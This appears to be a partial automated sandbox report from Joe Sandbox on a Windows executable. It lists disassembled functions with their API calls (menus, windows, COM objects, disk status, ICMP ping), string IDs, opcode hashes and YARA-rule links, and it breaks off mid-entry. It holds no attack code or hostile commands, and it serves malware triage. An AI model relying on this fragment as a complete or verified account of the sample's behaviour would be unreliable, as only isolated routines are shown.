                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: 87c09606686db9408abb44987813052b998c456edf36ec4e31fa1e0578e9aa43
                                                    • Instruction ID: 8256ed05c181bcd7ec375be621251731b1eb84ded971c693d6e923a230d598f3
                                                    • Opcode Fuzzy Hash: 87c09606686db9408abb44987813052b998c456edf36ec4e31fa1e0578e9aa43
                                                    • Instruction Fuzzy Hash: 7F41A031040141ABDB295F68DC9CBBA3B67EF46331F144365FDA58A2E6C7318D82DB61
                                                    Function 0066AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,0068F910), ref: 0066AB76
                                                    • GetDriveTypeW.KERNEL32(00000061,006BA620,00000061), ref: 0066AC40
                                                    • _wcscpy.LIBCMT ref: 0066AC6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: c20e58194144e5a65766113830ce01d68666254f94138ade4f1c6564bd463fdb
                                                    • Instruction ID: 8b88c634573b5bde0fd22097b774845915fc54bc5d9860a742b045c5f604c493
                                                    • Opcode Fuzzy Hash: c20e58194144e5a65766113830ce01d68666254f94138ade4f1c6564bd463fdb
                                                    • Instruction Fuzzy Hash: D2519A711483019BC754EF94C891AABB7A7EF85300F54482DF486672E2DB31AD4ACF63
                                                    Function 0068C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                      • Part of subcall function 00602344: GetCursorPos.USER32(?), ref: 00602357
                                                      • Part of subcall function 00602344: ScreenToClient.USER32(006C67B0,?), ref: 00602374
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0068C2E4
                                                    • ImageList_EndDrag.COMCTL32 ref: 0068C2EA
                                                    • ReleaseCapture.USER32 ref: 0068C2F0
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0068C39A
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0068C3AD
                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0068C48F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$prl$prl
                                                    • API String ID: 1924731296-3599107008
                                                    • Opcode ID: dd01052884524d551c3f120e272ab120c11170c8c4fc9c30fd679038099bcfe0
                                                    • Instruction ID: 8b14bf397584e002f977f5a94c8ec32d35e0d63822e9e6f86cfc9f8264ff6edd
                                                    • Opcode Fuzzy Hash: dd01052884524d551c3f120e272ab120c11170c8c4fc9c30fd679038099bcfe0
                                                    • Instruction Fuzzy Hash: 89518B70244305AFDB04EF24C855FAB7BE6EB88310F00462DF5958B2E1DB71A984DB66
                                                    Function 00609997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    • Opcode ID: 261631e03df43f504a026a226d943af96eb0274b500d9252d7538be04b18bff4
                                                    • Instruction ID: c997f16f8b816b7b65051745ec86406e6b661d5c71a5f58ad3a821c6651dd38b
                                                    • Opcode Fuzzy Hash: 261631e03df43f504a026a226d943af96eb0274b500d9252d7538be04b18bff4
                                                    • Instruction Fuzzy Hash: 7B410671A44619AFDB289B38DC42FB773EBEB04300F24446EE549D72C2EA719942CB51
                                                    Function 006873C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006873D9
                                                    • CreateMenu.USER32 ref: 006873F4
                                                    • SetMenu.USER32(?,00000000), ref: 00687403
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00687490
                                                    • IsMenu.USER32(?), ref: 006874A6
                                                    • CreatePopupMenu.USER32 ref: 006874B0
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006874DD
                                                    • DrawMenuBar.USER32 ref: 006874E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F
                                                    • API String ID: 176399719-3044882817
                                                    • Opcode ID: 77bd5f2e6df66ece38377401887bf29c2af2e92d9b3890d54a16c08b497f75bd
                                                    • Instruction ID: d0b10c598c38018c6c9bc0a0a2b8aa8f614ccbd93d95d82d6204dfc120b0626a
                                                    • Opcode Fuzzy Hash: 77bd5f2e6df66ece38377401887bf29c2af2e92d9b3890d54a16c08b497f75bd
                                                    • Instruction Fuzzy Hash: 40414774A01205EFDB10EF64D888EEABBF6FF49300F244228F955A7360D770A920CB60
                                                    Function 0068772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006877CD
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 006877D4
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006877E7
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006877EF
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 006877FA
                                                    • DeleteDC.GDI32(00000000), ref: 00687803
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0068780D
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00687821
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0068782D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 32241689dd721894a972ac35d45317fc07eeada364768c8af4521f13fa384490
                                                    • Instruction ID: 77854d7ce0d30e8b95d7e9ade2317bdafc7308ae453bb0d80eb7e0cf96569c13
                                                    • Opcode Fuzzy Hash: 32241689dd721894a972ac35d45317fc07eeada364768c8af4521f13fa384490
                                                    • Instruction Fuzzy Hash: FD316A72105215BBDF11AFA4DC09FDA3B6AEF49320F211324FA15A61A0D771D861DBA4
                                                    Function 00627040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0062707B
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    • __gmtime64_s.LIBCMT ref: 00627114
                                                    • __gmtime64_s.LIBCMT ref: 0062714A
                                                    • __gmtime64_s.LIBCMT ref: 00627167
                                                    • __allrem.LIBCMT ref: 006271BD
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006271D9
                                                    • __allrem.LIBCMT ref: 006271F0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0062720E
                                                    • __allrem.LIBCMT ref: 00627225
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00627243
                                                    • __invoke_watson.LIBCMT ref: 006272B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                    • Instruction ID: 9e289b8a41b9e45d88d5cc66e348c0a9627c39b5ff359c5cfbf14738108d6f34
                                                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                    • Instruction Fuzzy Hash: FF71C7B1A05B37ABD7149E79DC42F9AB3A6AF11320F14422EF514D6381E770EA448FD4
                                                    Function 00662A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662A31
                                                    • GetMenuItemInfoW.USER32(006C6890,000000FF,00000000,00000030), ref: 00662A92
                                                    • SetMenuItemInfoW.USER32(006C6890,00000004,00000000,00000030), ref: 00662AC8
                                                    • Sleep.KERNEL32(000001F4), ref: 00662ADA
                                                    • GetMenuItemCount.USER32(?), ref: 00662B1E
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00662B3A
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00662B64
                                                    • GetMenuItemID.USER32(?,?), ref: 00662BA9
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00662BEF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662C03
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662C24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: db648639b08932d589eb9ca19704071cccab193b3ad1fe45909ada50c6004ed9
                                                    • Instruction ID: 8188a65dbc7daaad5b031288dae51005772dc6d8613201d139a5ee1f81c118ff
                                                    • Opcode Fuzzy Hash: db648639b08932d589eb9ca19704071cccab193b3ad1fe45909ada50c6004ed9
                                                    • Instruction Fuzzy Hash: 2F61D1B090064AAFDB21CFA4CCA8EFE7BBAFB45308F140569F84197251D771AD45DB21
                                                    Function 00687192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00687214
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00687217
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068723B
                                                    • _memset.LIBCMT ref: 0068724C
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0068725E
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006872D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 2c51e12e1812c3d58a4f76c6e3783afed78dafb64214de5ba0e01aee2182c95b
                                                    • Instruction ID: c1f157b9f29fd4c9b27dce4d0175f016634af458f91823d4f65864066b0541c0
                                                    • Opcode Fuzzy Hash: 2c51e12e1812c3d58a4f76c6e3783afed78dafb64214de5ba0e01aee2182c95b
                                                    • Instruction Fuzzy Hash: D7616C71A00208AFDB10EFA4CC85EEE77FAEF09710F240259FA15A73A1D770A945DB64
                                                    Function 0065710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00657135
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0065718E
                                                    • VariantInit.OLEAUT32(?), ref: 006571A0
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 006571C0
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00657213
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00657227
                                                    • VariantClear.OLEAUT32(?), ref: 0065723C
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00657249
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00657252
                                                    • VariantClear.OLEAUT32(?), ref: 00657264
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0065726F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 22a0d133989345a27f537de51ef5398a60ad1941eccef87f202e936fd5008231
                                                    • Instruction ID: 51fead6503c020c0d729a90266535027d00fd0b6ffc18f8bbf7c7a6bc3cfb80d
                                                    • Opcode Fuzzy Hash: 22a0d133989345a27f537de51ef5398a60ad1941eccef87f202e936fd5008231
                                                    • Instruction Fuzzy Hash: 85415135A00119AFCF04DF65D8449AEBBFAFF08355F008169F955E7262CB31AA49CB90
                                                    Function 006786D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • CoInitialize.OLE32 ref: 00678718
                                                    • CoUninitialize.OLE32 ref: 00678723
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00692BEC,?), ref: 00678783
                                                    • IIDFromString.OLE32(?,?), ref: 006787F6
                                                    • VariantInit.OLEAUT32(?), ref: 00678890
                                                    • VariantClear.OLEAUT32(?), ref: 006788F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 7db36d1f013836c02d90d065d6d17815952d7dae9b24ffbd0892c5827b53e5eb
                                                    • Instruction ID: 27ef975e1484b6134c4460e5ce1512eb33ab6d296516c501c39426edd32147de
                                                    • Opcode Fuzzy Hash: 7db36d1f013836c02d90d065d6d17815952d7dae9b24ffbd0892c5827b53e5eb
                                                    • Instruction Fuzzy Hash: A161B270648301AFD714DF64C848B5FBBEAAF48714F14891DF98A9B291CB70ED44CBA6
                                                    Function 00675A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00675AA6
                                                    • inet_addr.WSOCK32(?,?,?), ref: 00675AEB
                                                    • gethostbyname.WSOCK32(?), ref: 00675AF7
                                                    • IcmpCreateFile.IPHLPAPI ref: 00675B05
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00675B75
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00675B8B
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00675C00
                                                    • WSACleanup.WSOCK32 ref: 00675C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: f82600612c7da21a0ebcc91b3de701a1049e942abd3481dada223f80df2d0a06
                                                    • Instruction ID: 8c1d26dc6ba20e6801eb178acb7ac644087514e8c6f9bf1e5619b5f9c2f4ac01
                                                    • Opcode Fuzzy Hash: f82600612c7da21a0ebcc91b3de701a1049e942abd3481dada223f80df2d0a06
                                                    • Instruction Fuzzy Hash: C651A031644700AFD710AF24CC59B6AB7E6EF48710F148A6DF95ADB2E1DBB0E840CB55
                                                    Function 0066B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066B73B
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0066B7B1
                                                    • GetLastError.KERNEL32 ref: 0066B7BB
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0066B828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 0a0d5e32a8598b87a9c22c7be37aa38dd5be44139ce02047519127413349f9e8
                                                    • Instruction ID: 52ac1f29ed161acfd1bd9db1abdb7c2c1ba5c4b594d8f7ff21272118881a4b95
                                                    • Opcode Fuzzy Hash: 0a0d5e32a8598b87a9c22c7be37aa38dd5be44139ce02047519127413349f9e8
                                                    • Instruction Fuzzy Hash: 1B31C435A40205EFCB10EFA4D885AFE7BBAFF84700F144029F502D7291DB719982CB91
                                                    Function 00659471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006594F6
                                                    • GetDlgCtrlID.USER32 ref: 00659501
                                                    • GetParent.USER32 ref: 0065951D
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00659520
                                                    • GetDlgCtrlID.USER32(?), ref: 00659529
                                                    • GetParent.USER32(?), ref: 00659545
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00659548
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: da300e27ef91b817ab34e7b25247a3cc4d601c0aa5d07bb3ab058048e9646e7d
                                                    • Instruction ID: bcab8f4b26738b9126a47793e59dc7a4bf71c7f49c33c7126356c36812237984
                                                    • Opcode Fuzzy Hash: da300e27ef91b817ab34e7b25247a3cc4d601c0aa5d07bb3ab058048e9646e7d
                                                    • Instruction Fuzzy Hash: 2921C470A40204BBCF05AB64CC85DFEBB76EF49300F104219F962972E1EB755959DB20
                                                    Function 0065955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
